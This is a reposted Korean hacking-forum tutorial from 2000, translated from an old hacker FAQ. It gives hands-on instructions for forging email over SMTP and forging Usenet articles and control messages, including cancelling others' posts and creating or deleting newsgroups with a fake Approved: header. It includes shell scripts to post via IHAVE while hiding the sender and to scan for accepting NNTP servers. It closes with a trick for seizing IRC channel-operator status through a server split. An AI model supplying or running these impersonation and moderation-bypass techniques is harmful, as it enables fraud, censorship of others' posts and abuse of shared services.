Hacking 관련 게시판

Hacking 관련 게시판

2000/08/06(21:34) from 203.255.160.61
작성자 : 강줄기 (jkkang65@hanmail.net)	조회수 : 4573 , 줄수 : 264

[강좌] 유닉스에서 해킹하기 - [3] 퍼온글

위조 메일(E-mail)은 어떻게 보내나?

메일이 온 것으로 보이게 할 호스트의 25 번 포트로 telnet을 한다. 다음 예
와 같이 메시지를 쳐 넣는다.

HELO bellcore.com

MAIL FROM:voyager@bellcore.com

RCPT TO:president@whitehouse.gov

DATA

From: voyager@bellcore.com (The Voyager)

To: president@whitehouse.gov

Subject: Clipper

Reply-To: voyager@bellcore.com

Please discontinue your silly Clipper initiative.

.

QUIT

RFC 931에 따라 구현된 시스템에서 "MAIL FROM:"을 속이는 것은 되지 않는
다. 자신에게 먼저 위조 메일을 보내서 확인한다.

RFC 822 "Standard for the format of ARPA Internet text
messages"에 더 많은 정보가 있다.

Usenet에서는 어떻게 위조 메시지를 조작하고 포스팅할 수 있나?

From: Anonymous (Pretending to be: tale@uunet.uu.net (David C
Lawrence))

Subject: FAQ: 위조를 통한 더 나은 삶 Date: 19 Mar 1995 02:37:09
GMT

"anonymous" 재전송 메일을 이용하지 않는 익명 넷뉴스(netnews).

최근 "NetNews Judges-L"에 영감을 얻어서, 여기서 제어 메시지를 위조하는
것을 포함하도록 하였다. 따라서 독자들은 자신의 투고를 취소하고 자신의 뉴
스그룹을 생성하고 삭제할 수 있게 되었다. 어떤 뉴스 기사들을 저장하라. 여
기서는 그것을 "hak"이라고 예를 들어 부르겠다. "hak"을 편집하고 문서형식
에서 해더는 제거한다.

From some!random!path!user (note: "From ", not "From: " !!)

Article:

Lines:

Xref:

Path: 의 헤더를 마지막 두 세 개의 까지로 줄인다.

이것은 뉴스 기사가 원래의 곳에서 포시팅 된 것처럼 보이거나, 보낸 곳의 근
처의호스트에서 보낸 것 처럼 만든다. 또는 전혀 새로운 Path: 줄을 만들어
서 가짜 에일리어스(alias)를 나타내게 할 수 있다.

다른 곳과 겹치지 않을만한 것으로 Message-ID: 필드를 변경한다. 이것은 @앞
에 두 자 정도의 아무 글자나 추가함으로서 할 수 있다. 왜냐하면 뉴스 포스
팅 프로그램은 대개 고정길이 필드를 이용하여 이러한 ID를 만들기 때문이다.
쓰고 싶은 아무 것이나를 다른 해더에 넣는다. --From:, Newsgroups:,
Sender: 등. 원래의 메시지를 자신의 메시지로 바꾼다. 관리되고 있는 뉴스그
룹에 포스팅을 할 때나 제어 메시지를 포시팅할 때, Approved: 헤더를 넣어
서 관리 메카니즘을 피해가는 것을 잊지 말아야 한다.

다른 사람의 기사를 취소할려고 할 때, 그것의 message-ID가 있어야 한다. 이
미 있는 메시지 헤더와 자신의 메시지 헤더는 message-ID와 더불어 다음과 같
은 것을 포함해야 한다. 이것은 "control message"를 만든다. 주의: 제어
메시지(control messages)는 대개 Approved: 해더가 필요하므로 하나를 추
가하도록 한다.

Approved: header as well, so you should add one.

Subject: cmsg cancel

Control: cancel

Approved: luser@twits.site.com

Newsgroups are created and destroyed with control messages,
too. If

you wanted to create, for instance, comp.misc.microsoft.sucks,
your

control headers would look like

Subject: cmsg newgroup comp.misc.microsoft.sucks

Control: newgroup comp.misc.microsoft.sucks

그룹이 "moderated with no moderator"(관리자없이 관리됨)을 원할 경우
문자열 "moderated"를 이 끝에 붙인다. 메시지의 본문 중간에 생성하려는 그
룹에 대한 설명과 함께 변경된 다음과 같은 텍스트를 포함해야 한다.

For your newsgroups file:

comp.misc.microsoft.sucks We don't do windows

그룹을 없애기 위해서 앞의 헤더 줄에서 "newsgroup"를 "rmgoup"으로 대치한
다.
대부분의 사이트에서 "rmgroup" 요청을 관리하는 사람이 그렇게 할 것인지 아
닌지를 정하게 하고 있다는 것을 명심하자. 그룹 생성은 아마도 삭제보다는 자
동화되어 있을 것이다. 뉴스그룹 변경은 나 자신으로부터의 것일 경우 효과가
있을 가능성이높다. 왜냐하면 나의 이름이 많은 NNTP 서버의 제어 스크립트에
들어 있기 때문이다. 따라서 이 포스팅의 헤더로부터 From: 과 Approved:
을 이용하은 것을 권고한다.

변경된 기사를 저장하고 자신의 사이트나 자신을 가리키는 것이 없도록 확실하
게 한다. 그리고 자신이 제일 좋아하는 IHAVE 명령을 전달할 수 있는 NNTP 서
버에 보낸다. 이 때 다음과 같은 스크립트를 이용한다.

=======================

#! /bin/sh

## Post an article via IHAVE.

## args: filename server

if test "$2" = "" ; then

echo usage: $0 filename server

exit 1

fi

if test ! -f $1 ; then

echo $1: not found

exit 1

fi

# suck msg-id out of headers, keep the brackets

msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \

sed 's/.*-[Ii][Dd]: //'`

echo $msgid

( sleep 5

echo IHAVE $msgid

sleep 5

cat $1

sleep 1

echo "."

sleep 1

echo QUIT ) | telnet $2 119

=======================

기사가 하루나 이틀 사이에 나타나지 않을 경우, 다른 서버를 시도해본다. 서
버는 찾기 쉽다. 여기에 저장된 네트뉴스를 시도해 볼 수 있는 서버의 목록으
로 나누어주는 스크립트가 있다. 여기서 나오게 될 결과를 편집하여 사람 이름
이 분명한 것과 다른 쓰레기들을 제거하고 사용하면 된다.

=======================

#! /bin/sh

FGV='fgrep -i -v'

egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\

/g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp

=======================

Once you have your host list, feed it to the following script.

=======================

#! /bin/sh

while read xx ; do

if test "$xx" = "" ; then continue;

fi

echo === $xx

( echo open $xx 119

sleep 5

echo ihave IamSOk00l@podunk.edu

sleep 4

echo .

echo quit

sleep 1

echo quit

) | telnet

done

=======================

위의 스크립트의 이름이 "findem"이고 csh을 이용하고 있다면,

findem < list >& outfile

라고 명령어를 입력하여 모든 telnet의 출력을 저장할 수 있도록 한다. 시간
이 오래걸릴 수도 있으나, 끝나면 "outfile"을 편집하고 "335"가 있는 곳을
찾는다.
이것은 서버가 기사를 받을 준비가 되었다는 것을 의미한다. 이것은 완전히
믿을만한 표시는 아니다. 왜냐하면 어떤 서버는 기사를 받겠다고 응답을 하고
나서 기사를 버리는 경우도 있기 때문이다. 다른 사람의 메시지를 약간만 변형
해서 서버에 보내본 뒤 기사나 나타나는지를 확인한다. 때때로 telnet이 이상
한 상태에 빠져 멈추기도 한다. 특히 서버가 NNTP 연결을 거부하는 경우에 특
히 그렇다. 만일 멈추어 버린 telnet 프로세스를 kill명령으로 죽이고 스크립
트는 수행상태로 놓아둔다면, 스크립트는 계속 수행된다. 다시 말해서 수행중
인 finding script를 잠시 감시해야 한다.

IHAVE 를 받아들이지 않으면서 "posting ok"를 보내는 서버를 발결할 수도
있다.
이런 서버들은 POSTS를 통해서 할 수 있을 것이다. 그러나, 이런 서버들은
어디서부터 연결된 것인지를 포함하은 헤더를 가지는 "NNTP-Posting-
Host: "를 추가할 것이다. 그러므로 완전히 익명이 될 수 없다.

여기에 나온 정보를 건설적인 목적으로만 사용하기를 바란다.

IRC에서 어떻게 ChanOp(channel operator)를 해킹할 수 있나?

다른 IRC 서버들과 분리된 서버를 찾아낸다. 그리고 채널 OP가 되고 싶은 채
널의 이름을 가지고 새로운 채널을 만든다. 서버가 IRC 네트워크에 연결될
때, 실제 채널에서도 OP까 된다. 서버 OP일 경우 고의로 서버를 분리할 수 있
다.